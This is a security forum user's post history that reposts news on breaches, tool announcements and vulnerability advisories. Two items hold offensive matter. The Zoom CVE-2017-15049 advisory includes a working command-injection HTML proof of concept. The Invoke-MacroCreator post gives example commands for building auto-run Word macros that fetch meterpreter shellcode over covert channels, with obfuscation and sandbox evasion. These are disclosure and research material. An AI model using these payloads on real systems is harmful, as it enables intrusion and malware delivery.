Everything posted by Fi8sVrs
-
wanakiwi - Automated wanadecrypt with key recovery if lucky
Fi8sVrs posted a topic in Programe utile
wanakiwi

Introduction

This utility allows machines infected by the WannaCry ransomware to recover their files. wanakiwi is based on wanadecrypt, which makes it possible for lucky users to:

- Recover the private user key in memory to save it as 00000000.dky
- Decrypt all of their files

The primes extraction method is based on Adrien Guinet's wannakey, which consists of scanning the WannaCry process memory to recover the prime numbers that were not cleaned during CryptReleaseContext(). Adrien's method was originally described as only valid for Windows XP but @msuiche and I proved this can be extended to Windows 7.

Usage

Process access

wanakiwi.exe [/pid:PID|/process:program.exe]

pid or process are optional parameters; by default the utility will look for any of these processes:

- wnry.exe
- wcry.exe
- data_1.exe
- ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
- tasksche.exe

Limitations

Given the fact this method relies on scanning the address space of the process that generated those keys, this means that if this process had been killed by, for instance, a reboot, the original process memory will be lost. It is very important for users to NOT reboot their system before trying this tool.

Secondly, for the same reason, we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility ASAP.

This is not a perfect tool, but this has been so far the best solution for victims who had no backup.

Compatibility (O.S. / x86 / x64): Windows XP ?; Windows 2003 ?; Windows 7 ?

Frequently Asked Questions (F.A.Q.)

Does it modify the original encrypted files?
No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files.

Does it work on an infected machine that had been rebooted or shut down?
No, the whole point is to be able to analyze the process memory of the process which created the keys. If it had been shut down or rebooted, this memory state is lost.

What about hibernated machines?
Yes, when you hibernate your machine it actually saves the state of memory on disk, which allows keeping the process memory state. In those scenarios, a machine which has been hibernated for multiple days has its memory state intact and identical to the day it hibernated, which actually raises your chances of file recovery.

What shall we do after recovering our files?
We strongly recommend you immediately back up those recovered files on an external empty disk before rebooting or shutting down your machine, including the 00000000.dky file generated by wanakiwi, which is the decryption key. Once you have backed up your recovered files, we recommend you reinstall a fresh version of Windows.

Acknowledgement

This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)

With BIG thanks and love to: @msuiche <3 @halsten @malwareunicorn @adriengnt

Download: wanakiwi-master.zip

Resources:
https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d
https://github.com/gentilkiwi/wanakiwi
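As an added illustration of the recovery idea behind wanakiwi and wannakey (example code written for this page, not code from either project), the block below scales the method down so it fits in plain C: the "modulus" is a 64-bit product of two 32-bit primes, and the scanner slides a 4-byte window over a constructed memory image, reads each window as a little-endian integer (CryptoAPI stores multiprecision integers little-endian), and keeps the first prime that divides the modulus. The names scan_for_prime_factor, sample_image and the toy primes TOY_P/TOY_Q are this example's own; the real tools run the same test with 1024-bit primes over the live process memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Trial-division primality test for 32-bit values (fast enough here:
 * at most ~32k odd divisors per candidate). */
int is_prime32(uint32_t n) {
    if (n < 2) return 0;
    if (n % 2 == 0) return n == 2;
    for (uint32_t d = 3; (uint64_t)d * d <= n; d += 2)
        if (n % d == 0) return 0;
    return 1;
}

/* Read four bytes as a little-endian integer, independent of host order. */
static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Slide a 4-byte window over the memory image. A window is a hit when it is
 * a prime that divides the modulus non-trivially; the cofactor is then the
 * other prime. Returns the prime found (0 if none); reports where it was
 * found via *offset and the cofactor via *cofactor when those are non-NULL. */
uint32_t scan_for_prime_factor(const uint8_t *mem, size_t len, uint64_t modulus,
                               size_t *offset, uint32_t *cofactor) {
    for (size_t i = 0; i + 4 <= len; i++) {
        uint32_t cand = le32(mem + i);
        if (cand < 2 || cand >= modulus) continue;   /* trivial factors */
        if (modulus % cand != 0) continue;            /* cheap test first */
        if (!is_prime32(cand)) continue;
        if (offset) *offset = i;
        if (cofactor) *cofactor = (uint32_t)(modulus / cand);
        return cand;
    }
    return 0;
}

/* Toy key: two 32-bit primes; their product plays the role of the RSA modulus. */
#define TOY_P 4294967291u   /* 2^32 - 5, prime */
#define TOY_Q 4294967279u   /* 2^32 - 17, prime */
const uint64_t sample_modulus = (uint64_t)TOY_P * TOY_Q;

/* Constructed memory image (not a real dump): unrelated bytes, then TOY_P
 * stored little-endian at offset 7, then more unrelated bytes. */
const uint8_t sample_image[] = {
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* 7 filler bytes */
    0xFB, 0xFF, 0xFF, 0xFF,                     /* TOY_P as little-endian */
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41          /* more filler */
};
const size_t sample_image_len = sizeof(sample_image);

int main(void) {
    size_t off = 0;
    uint32_t q = 0;
    uint32_t p = scan_for_prime_factor(sample_image, sample_image_len,
                                       sample_modulus, &off, &q);
    if (p)
        printf("prime %lu found at offset %lu, cofactor %lu\n",
               (unsigned long)p, (unsigned long)off, (unsigned long)q);
    else
        printf("no prime factor found in image\n");
    return 0;
}
```

The divisibility check runs before the primality test because a modulus reduction is far cheaper than trial division, and in the real setting (a 1024-bit candidate against a 2048-bit modulus) almost every window fails it; that ordering is what keeps a scan over hundreds of megabytes of process memory practical.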
Learn programming and devops in a live environment anytime, anywhere

A Beginner's Guide to LabEx
If you are interested in programming but don't know where and how to get started, this course will show you the basic computer-related knowledge and how you can utilize LabEx's live environment to excel in IT by doing real practice.

Linux Tutorial
LabEx's experimental environment is based on Linux. If you are familiar with Linux then you can skip this tutorial and start exploring LabEx right away. If Linux sounds new to you, please follow every step in this tutorial. This course covers all the basic concepts you need to know.

Scrapy Tutorial: Web Scraping LabEx and Github
Scrapy is an open source scraper framework implemented in Python. With the principle of "Do not Repeat Yourself", Scrapy provides a set of solutions for preparing the basic framework for scrapers and for the common problems met while writing them. This course will use LabEx and Github as examples to demonstrate how to complete a series of actions and commands.

More Courses

Source: https://labex.io/
-
Bitcoin's value hit a high of more than $19,000 this year, prompting attacks by hackers. A crypto-currency exchange in South Korea is shutting down after it was hacked for the second time in less than eight months. Youbit, which lets people buy and sell bitcoins and other virtual currencies, has filed for bankruptcy after losing 17% of its assets in the cyber-attack. It did not disclose how much the assets were worth at the time of the attack. In April, Youbit, formerly called Bithumb, lost 4,000 bitcoins now worth $73m (£55m) to Kisa.

Crime wave

South Korea's Internet and Security Agency (Kisa), which investigates net crime, said it had started an enquiry into how the thieves gained access to the exchange's core systems. Kisa blamed the earlier attack on Youbit on cyber-spies working for North Korea. Separate, more recent attacks on the Bithumb and Coinis exchanges have also been blamed on the regime. No information has been released about who might have been behind the latest Youbit attack. In a statement, Youbit said that customers would get back about 75% of the value of the crypto-currency they have lodged with the exchange. It said it was "very sorry" that it had been forced to shut down. The exchange added that the hackers did not manage to steal all the digital cash it held because a lot was lodged in a "cold wallet", a secure store used to hold the assets that were not being traded. Youbit was one of the smaller exchanges active in South Korea. The majority of Bitcoin trading in the country is done on the Bithumb exchange, which has a 70% market share. More and more cybercriminals have tried to cash in on the boom in virtual currencies such as Bitcoin. Many have created malware that seeks to use victims' computers to create or "mine" valuable currencies. Others have simply attacked exchanges and other crypto-cash service firms to get at large numbers of bitcoins at once.
Earlier this month, hackers got away with more than $80m in bitcoins from NiceHash, a Slovenia-based mining exchange. Via bbc.com
-
Security researchers have discovered and disclosed details of two unpatched critical vulnerabilities in a popular internet forum software, vBulletin, one of which could allow a remote attacker to execute malicious code on the latest version of the vBulletin application server. vBulletin is a widely used proprietary Internet forum software package based on PHP and the MySQL database server. It powers more than 100,000 websites on the Internet, including the websites and forums of Fortune 500 and Alexa Top 1 million companies. The vulnerabilities were discovered by a security researcher from Italy-based security firm TRUEL IT and an unknown independent security researcher, who disclosed the details of the vulnerabilities through Beyond Security's SecuriTeam Secure Disclosure program. The vulnerabilities affect version 5 of the vBulletin forum software and are currently unpatched. Beyond Security claims it tried to contact vBulletin since November 21, 2017, but received no response from the company.

vBulletin Remote Code Execution Vulnerability

The first vulnerability discovered in vBulletin is a file inclusion issue that leads to remote code execution, allowing a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated attacker can trigger the file inclusion vulnerability by sending a GET request to index.php with the routestring= parameter in the request, eventually allowing the attacker to "create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server." The researcher has also provided Proof-of-Concept (PoC) exploit code to show the exploitation of the vulnerability. A Common Vulnerabilities and Exposures (CVE) number has not been assigned to this particular vulnerability.

vBulletin Remote Arbitrary File Deletion Vulnerability

The second vulnerability discovered in the vBulletin forum software version 5 has been assigned CVE-2017-17672 and is described as a deserialization issue that an unauthenticated attacker can exploit to delete arbitrary files and even execute malicious code "under certain circumstances." The vulnerability is due to unsafe usage of PHP's unserialize() on user-supplied input, which allows an unauthenticated hacker to delete arbitrary files and possibly execute arbitrary code on a vBulletin installation. A publicly exposed API, vB_Library_Template's cacheTemplates() function, allows fetching information on a set of given templates from the database to store them inside a cache variable. Besides technical details, the advisory also includes Proof-of-Concept (PoC) exploit code to explain the severity of this vulnerability. We expect the vendor to release the patch for both security flaws before hackers start exploiting them to target vBulletin installations.

Source: thehackernews.com
-
The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes it possible to trigger the vulnerability remotely. Version 2.0.106600.0904 is affected.

Zoom Linux Client Command Injection Vulnerability (RCE)

1. Advisory Information

Conviso Advisory ID: CONVISO-17-003
CVE ID: CVE-2017-15049
CVSS v2: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Date: 2017-10-01

2. Affected Components

Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb). Other versions may be vulnerable.

3. Description

The binary /opt/zoom/ZoomLauncher is vulnerable to command injection because it uses user input to construct a shell command without proper sanitization. The client registers a scheme handler (zoommtg://) and this makes it possible to trigger the vulnerability remotely.

4. Details

gef> r '$(uname)'
Starting program: /opt/zoom/ZoomLauncher '$(uname)'
ZoomLauncher started.
cmd line: $(uname)
$HOME = /home/user

Breakpoint 5, 0x0000000000401e1f in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e1f <_Z9startZoomPcS_+744>: call 0x4010f0 <strcat@plt>
   0x401e24 <_Z9startZoomPcS_+749>: lea rax,[rbp-0x1420]
   0x401e2b <_Z9startZoomPcS_+756>: mov rcx,0xffffffffffffffff
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \""
gef> x/s $rsi
0x7fffffffd750: "$(uname) "
gef> c
Continuing.
export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom "$(uname) "

Breakpoint 6, 0x0000000000401e82 in startZoom(char*, char*) ()
gef> x/3i $pc
=> 0x401e82 <_Z9startZoomPcS_+843>: call 0x401040 <system@plt>
   0x401e87 <_Z9startZoomPcS_+848>: mov DWORD PTR [rbp-0x18],eax
   0x401e8a <_Z9startZoomPcS_+851>: mov eax,DWORD PTR [rbp-0x18]
gef> x/s $rdi
0x7fffffffbf10: "export SSB_HOME=/home/user/.zoom; export QSG_INFO=1; export LD_LIBRARY_PATH=/opt/zoom;/opt/zoom/zoom \"$(uname) \""

--- RCE POC ---

<html>
<head>
</head>
<body>
<h1>Zoom POC RCE</h1>
<script>
window.location = 'zoommtg://$(gnome-calculator${IFS}-e${IFS}1337)'
</script>
</body>
</html>

5. Solution

Upgrade to latest version.

6. Credits

Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>

7. Report Timeline

Sep 28, 2017 - Conviso sent first email asking for a channel to discuss the vulnerability.
Sep 28, 2017 - Vendor asked for the report in the current channel.
Sep 28, 2017 - Conviso sent information to reproduce the vulnerability.
Sep 28, 2017 - Conviso asked if they could reproduce it.
Sep 28, 2017 - Vendor replied saying that the information was forwarded to the engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed out problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed out problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved, considering the patch a satisfactory fix.
Nov 30, 2017 - Vendor released version 2.0.115900.1201

8. References

https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux

9. About Conviso

Conviso is a consulting company specialized in application security. Our values are based on the allocation of the adequate competencies in the field, a clear and direct speech with the market, collaboration and partnership with our customers and business partners, and constant investment in methodology and research improvement. For more information about our company and services provided, please check our website at www.conviso.com.br.

10. Copyright and Disclaimer

The information in this advisory is Copyright 2017 Conviso Application Security S/A and provided so that society can understand the risk they may be facing by running affected software, hardware or other components used on their systems. In case you wish to copy information from this advisory, you must either copy all of it or refer to this document (including our URL). No guarantee is provided for the accuracy of this information, or damage you may cause your systems in testing.

# 0day.today [2017-12-18] #
Source: 0day.today
Tagged with: cve-2017-15049, zoomlauncher (and 1 more)
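The gdb session in the advisory shows the whole bug class in two calls: strcat() appends the untrusted zoommtg:// argument to a command string, and system() hands that string to /bin/sh. As an added example (written for this page, not Conviso's or Zoom's code), the C block below puts that vulnerable construction next to a launcher that sets the environment in the child and passes the argument as its own argv[] element through execv(), so no shell ever parses it. The paths and variable names mirror the gdb dump; build_command_unsafe, has_shell_metachars, is_wellformed_zoommtg, launch_safe and the allowlist they apply are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define ZOOM_EXE "/opt/zoom/zoom"   /* path taken from the advisory's dump */

/* Characters /bin/sh still interprets inside a double-quoted string
 * ($ ` \ ") or that would end/chain the command. Returns 1 if any is
 * present in the argument, 0 otherwise. */
int has_shell_metachars(const char *arg) {
    return strpbrk(arg, "$`\\\";|&<>()\r\n") != NULL;
}

/* Positive check: zoommtg:// scheme plus an allowlist of URL characters.
 * The allowlist is this example's choice, deliberately without $ ( ) ; &. */
int is_wellformed_zoommtg(const char *arg) {
    static const char prefix[] = "zoommtg://";
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
        "-._~:/?=%+";
    if (strncmp(arg, prefix, sizeof prefix - 1) != 0) return 0;
    const char *rest = arg + (sizeof prefix - 1);
    if (*rest == '\0') return 0;
    return rest[strspn(rest, allowed)] == '\0';
}

/* The vulnerable shape from the advisory: one string built by concatenation,
 * which the real launcher then passed to system(). Built here only so it can
 * be inspected; it is never executed. Returns 0 on success, -1 if truncated. */
int build_command_unsafe(char *out, size_t outlen, const char *home, const char *arg) {
    int n = snprintf(out, outlen,
                     "export SSB_HOME=%s/.zoom; export QSG_INFO=1; "
                     "export LD_LIBRARY_PATH=/opt/zoom;" ZOOM_EXE " \"%s\"",
                     home, arg);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Hardened launch: environment set with setenv() in the child, argument
 * delivered as argv[1] via execv(). Input validation stays as defence in
 * depth. Returns the child's exit status, or -1 when refused or on error. */
int launch_safe(const char *exe, const char *home, const char *arg) {
    if (has_shell_metachars(arg) || !is_wellformed_zoommtg(arg)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char ssb_home[512];
        snprintf(ssb_home, sizeof ssb_home, "%s/.zoom", home);
        setenv("SSB_HOME", ssb_home, 1);
        setenv("QSG_INFO", "1", 1);
        setenv("LD_LIBRARY_PATH", "/opt/zoom", 1);
        char *argv[] = { (char *)exe, (char *)arg, NULL };
        execv(exe, argv);   /* no shell involved: arg is a single argv entry */
        _exit(127);          /* only reached if exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char cmd[1024];
    if (build_command_unsafe(cmd, sizeof cmd, "/home/user", "$(uname)") == 0)
        printf("string the launcher handed to system():\n  %s\n", cmd);
    printf("safe launch of a valid URL via /bin/echo -> exit %d\n",
           launch_safe("/bin/echo", "/home/user", "zoommtg://zoom.us/join?confno=123"));
    printf("safe launch of an injected URL -> %d (refused)\n",
           launch_safe("/bin/echo", "/home/user", "zoommtg://$(uname)"));
    return 0;
}
```

The important change is not the validation but the exec path: with execv() the $(...) text would reach the zoom binary as a literal argument even if validation were skipped, which is why the advisory's fix is about how the command is run rather than about quoting.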
-
Intention matters; mail sent.
-
Macro Creator

Author: Arno0x0x - @Arno0x0x

Invoke-MacroCreator is a PowerShell cmdlet that allows for the creation of an MS-Word document embedding a VBA macro with various payload delivery and execution capabilities.

Description

Basically the script supports three types of payload that you MUST specify using the -t argument:

- shellcode: any raw shellcode (for instance created with msfvenom). The shellcode is loaded into memory then loaded into the MS-Word process space and executed.
- file: any type of file (executable, script, whatever...). The file is first saved to a local temporary directory then called thanks to a command line specified as an argument.
- command: any command line to be executed

In either case, the payload itself must be a file (even a command type payload should be in a file). The file is specified using the -i argument.

Those payloads can be delivered through several delivery methods that you MUST specify using the -d argument:

- body: the payload is embedded into the body of the MS-Word document in an encoded form. This comes with a limit in terms of size of file that can be embedded.
- comment: the payload is embedded into the comment of the MS-Word document in a base64 encoded form. This technique is inspired by Invoke-Commentator.
- webdav: the payload is downloaded over a specific WebDAV covert channel (PROPFIND only) and requires a tool at the server side counterpart: WebDavDelivery. The process seen performing network traffic is 'svchost.exe'.
- biblio: aka "Bibliography sources". The payload is embedded in a bibliography sources XML file and then loaded over HTTP(S). The generated 'sources.xml' file must be hosted on a web server. The process seen performing network traffic is 'word.exe'.
- html (using IE): the payload is embedded into a simple HTML file and then downloaded over HTTP(S) from an Internet Explorer COM object. The generated 'index.html' file must be hosted on a web server. The process seen performing network traffic is 'iexplorer.exe'
- dns: the payload is downloaded over a DNS request covert channel, in several chunks that are reassembled in memory. It is required to own a domain name and to use the DNSDelivery tool. When using DNSDelivery with Invoke-MacroCreator, the type of payload to deliver doesn't matter as it is not consumed by the macro. In other words: set it to whatever you want.

If the payload type is a file, use the -c option to define how the file should be called or executed.

If the delivery method is webdav, biblio or html, you can set the UNC/URL to use with the -url option. If you don't set this UNC/URL, the default parameters defined in the script's global variables section are used.

If the delivery method is dns, use the -dn option to set the domain name to be used. If you don't set this domain name, the default one defined in the script's global variables section is used.

When a command is to be executed (file or cmd payload), three different execution methods are available that can be chosen using the -m switch.

[Optional] Using the optional -o switch, some level of obfuscation is applied on parts of the macro. Obfuscation is applied on:

- Variable names (in the template files, all variables surrounded by '_', ex: _varName_)
- Function names (in the template files, all functions surrounded by '#', ex: #FunctionName#)
- All string parameters (in the template files, all strings surrounded by '-', ex: -"any string"-)

[Optional] Using the optional -e switch, some sandbox evasion technique can also be included. If a sandbox is being detected, the payload is not executed and the macro stops.

[Optional] Using the optional -a switch, auto open functions are added so that the macro is executed automatically when the document is opened. This is what you want for an "effective" attack, but probably not for testing/debugging purposes.

Dependencies

Invoke-MacroCreator requires a proper installation of Microsoft Word.

Examples

Here are some sample examples:

Shellcode embedded in the body of the MS-Word document, no obfuscation, no sandbox evasion:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body

Shellcode delivered over WebDAV covert channel, with obfuscation, no sandbox evasion:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o

Scriptlet delivered over bibliography source covert channel, with obfuscation, with sandbox evasion:
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e

Executable delivered over WebDAV covert channel, using default UNC, no obfuscation, with sandbox evasion, using execution method 3:
C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3

Command line embedded in the body of the MS-Word document, with obfuscation, no sandbox evasion, using execution method 1:
C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1

Shellcode embedded in a comment of the MS-Word document, no obfuscation, no sandbox evasion, adding auto-open functions:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a

Shellcode delivered over the DNS delivery covert channel using domain "mydomain.com", with obfuscation, no sandbox evasion:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o

Download: Invoke-MacroCreator.ps1, MacroCreatorTemplates.ps1

Source: https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
-
What Droidefense is

Droidefense (originally named atom: analysis through observation machine) is the codename for an Android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researchers have in their everyday work. For those situations where the malware has anti-analysis routines, Droidefense attempts to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection, tracer pid check, and so on.

Droidefense uses an innovative idea in which the code is not decompiled rather than viewed. This allows us to get the global view of the execution workflow of the code with 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.

Usage

TL;DR

java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar

[ASCII-art "droidefense" banner]

* Current build: 2017_12_05__12_07_01
* Check out on Github: https://github.com/droidefense/
* Report your issue: https://github.com/droidefense/engine/issues
* Lead developer: @zerjioang

usage: droidefense
 -d,--debug                print debugging information
 -h,--help                 print this message
 -i,--input <apk>          input .apk to be analyzed
 -o,--output <format>      select prefered output: json json.min html
 -p,--profile              Wait for JVM profiler
 -s,--show                 show generated report after scan
 -u,--unpacker <unpacker>  select prefered unpacker: zip memapktool
 -v,--verbose              be verbose
 -V,--version              show current version information

Useful info

Check out how to compile a new version at: https://github.com/droidefense/engine/wiki/Compilation
Check out a report example at: https://github.com/droidefense/engine/wiki/Pornoplayer-report
Check out execution logs at: https://github.com/droidefense/engine/wiki/Execution-logs

Contributing

Everybody is welcome to contribute to DROIDEFENSE. Please check out the DROIDEFENSE Contribution Steps for instructions about how to proceed. Any other comments will be very appreciated.

Citing

Feel free to cite droidefense in your works. We added the next boilerplate for your references:

@Manual{,
  title = {Droidefense: Advance Android Malware Analysis Framework},
  author = {{zerjioang}},
  organization = {opensource},
  address = {Bilbao, Spain},
  year = 2017,
  url = {https://droidefense.wordpress.com/}
}

License

All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.

Uses the GPL license described below.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

Latest release: Download

Source: https://github.com/droidefense/engine
-
Symantec Hackers utilizing the Triton malware have managed to close down industrial operations in the Middle East, researchers have warned. On Thursday, cybersecurity researchers from FireEye's Mandiant revealed that threat actors deployed malware capable of manipulating emergency shutdown systems at a critical infrastructure firm in the Middle East. The new form of malware, dubbed Triton, is one of only a handful of malware families known to have been developed for the purpose of attacking industrial processes and core infrastructure we all rely upon for supplies such as gas, oil, and electricity. Stuxnet was one of the first indicators that such malware exists after the worm was used against industrial players in Iran in 2010, and in 2014, a South Korean nuclear facility was targeted. In 2016, Ukraine's capital Kiev had a power outage after malware took down a power grid. The new Trojan, which Symantec researchers say has been active since at least August this year, has been designed to communicate with a specific type of industrial control system (ICS), namely safety instrumented systems (SIS) controllers produced by Triconex. Triton is an attack framework built to tamper with such controllers by communicating with them through computers using the Microsoft Windows operating system. According to Symantec -- while it is early days into the investigation -- the malware appears to inject code which modifies the behavior of SIS devices, leading to threat actor control and potential damage. In the case of the victim company, Triton was used to target emergency shutdown capabilities. However, the security researchers believe Triton was intended for use in "causing physical damage," but the plant was shut down inadvertently during the attack instead. The malware was deployed in order to reprogram the SIS controllers but some of the devices entered a failed safe state which closed the plant down and alerted operators to the scheme. 
The majority of cyberattackers have money in mind when they deploy malware or infiltrate systems, whether it be to clear out customer accounts or to steal valuable corporate data. However, in this case, there was no clear financial goal, but the group's persistence, skill, the targeting of core infrastructure, and what appears to be the resources at their disposal all point towards state sponsorship. In October, the FBI and US Department of Homeland Security (DHS) warned that energy companies are now under constant attack by threat actors seeking to steal information related to their control systems. Firms in the energy, nuclear, water, aviation, and critical manufacturing sectors are at risk, according to the agencies, from hackers which target small firms as stepping stones towards more valuable companies. Via zdnet.com
-
Security researchers have publicly disclosed an unpatched zero-day vulnerability in the firmware of AT&T DirecTV WVB kit after trying to get the device manufacturer to patch this easy-to-exploit flaw over the past few months. The problem is with a core component of the Genie DVR system that's shipped free of cost with DirecTV and can be easily exploited by hackers to gain root access and take full control of the device, placing millions of people who've signed up to DirecTV service at risk. The vulnerability actually resides in WVBR0-25—a Linux-powered wireless video bridge manufactured by Linksys that AT&T provides to its new customers. DirecTV Wireless Video Bridge WVBR0-25 allows the main Genie DVR to communicate over the air with customers' Genie client boxes (up to 8) that are plugged into their TVs around the home. Trend Micro researcher Ricky Lawshae, who is also a DirecTV customer, decided to take a closer look at the device and found that Linksys WVBR0-25 hands out internal diagnostic information from the device's web server, without requiring any authentication. When trying to browse to the wireless bridge's web server on the device, Lawshae was expecting a login page or similar, but instead, he found "a wall of text streaming before [his] eyes." Once there, Lawshae was able to see the output of several diagnostic scripts containing everything about the DirecTV Wireless Video Bridge, including the WPS pin, connected clients, running processes, and much more. What's more worrisome was that the device was accepting his commands remotely and that too at the "root" level, meaning Lawshae could have run software, exfiltrate data, encrypt files, and do almost anything he wanted on the Linksys device. Lawshae also provided a video, demonstrating how a quick and straightforward hack let anyone get a root shell on the DirecTV wireless box in less than 30 seconds, granting them full remote unauthenticated admin control over the device. 
The vulnerability was reported by the ZDI Initiative to Linksys more than six months ago, but the vendor ceased communication with the researcher and had not yet fixed the problem, leaving this easy-to-exploit vulnerability unpatched and open for hackers. So, after over half a year, ZDI decided to publicize the zero-day vulnerability, and recommended users limit the devices that can interact with the Linksys WVBR0-25 "to those that actually need to reach" it in order to protect themselves. Via thehackernews.com
Tagged with: wvbr0-25, remote root exploit (and 4 more)
-
Avast open sourced the LLVM-based decompiler RetDec
Fi8sVrs replied to malsploit's topic in Stiri securitate
It looks awful on the white theme.
macOS and iOS suffer from a kernel double free vulnerability due to IOSurfaceRootUserClient not respecting MIG ownership rules.

advisory-info.txt

iOS/MacOS kernel double free due to IOSurfaceRootUserClient not respecting MIG ownership rules
CVE-2017-13861

I have previously detailed the lifetime management paradigms in MIG in the writeups for:

CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926]
and
CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]

If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it. If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.

If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference on that mach port passed to the external method will be managed by MIG semantics. If the external method returns an error then MIG will assume that the reference was not consumed by the external method and as such the MIG generated code will drop a reference on the port.

IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port (via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered a port with the same callback function. The external method's error return value propagates via the return value of is_io_connect_async_method back to the MIG generated code which will drop a further reference on the wake_port when only one was taken.

This bug is reachable from the iOS app sandbox as demonstrated by this PoC.

Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
Tested on MacOS 10.13 (17A365) on MacBookAir5,2

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: ianbeer

Download GS20171212052309.tgz (2.1 KB)
https://packetstormsecurity.com/files/145365/macOS-iOS-Kernel-IOSurfaceRootUserClient-Double-Free.html
Tagged with: cve-2017-13861, ianbeer (and 2 more)
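The advisory's whole argument is the MIG ownership rule: an error return means "I consumed nothing", so the generated caller drops the message's reference itself, and a method that has already released that reference on its error path makes the count go one too low. As an added model of that rule (written for this page; neither Apple's code nor the PoC from the advisory), the C block below reduces MIG to a reference counter with a one-slot notify registration, and runs the buggy and the corrected shape of the external method through the same dispatch and teardown sequence. port_t, client_t, set_notify_buggy, set_notify_fixed and mig_dispatch are this example's own simplification.

```c
#include <stdio.h>
#include <stddef.h>

/* A mach port reduced to its reference count. over_released records a
 * release that happened with no reference left, i.e. the double free. */
typedef struct {
    int refs;
    int over_released;
} port_t;

/* A user client that can hold one registered notify port. */
typedef struct {
    port_t *notify_port;
} client_t;

enum { KERN_SUCCESS = 0, KERN_FAILURE = 5 };

typedef int (*notify_method_t)(client_t *, port_t *);

static void port_retain(port_t *p) { p->refs++; }

static void port_release(port_t *p) {
    if (p->refs <= 0) { p->over_released = 1; return; }
    p->refs--;
}

/* The shape the advisory describes: on the "already registered" path the
 * method releases the caller's reference AND returns an error, so the
 * caller will release it a second time. */
int set_notify_buggy(client_t *c, port_t *wake_port) {
    if (c->notify_port != NULL) {
        port_release(wake_port);   /* consumed one reference ... */
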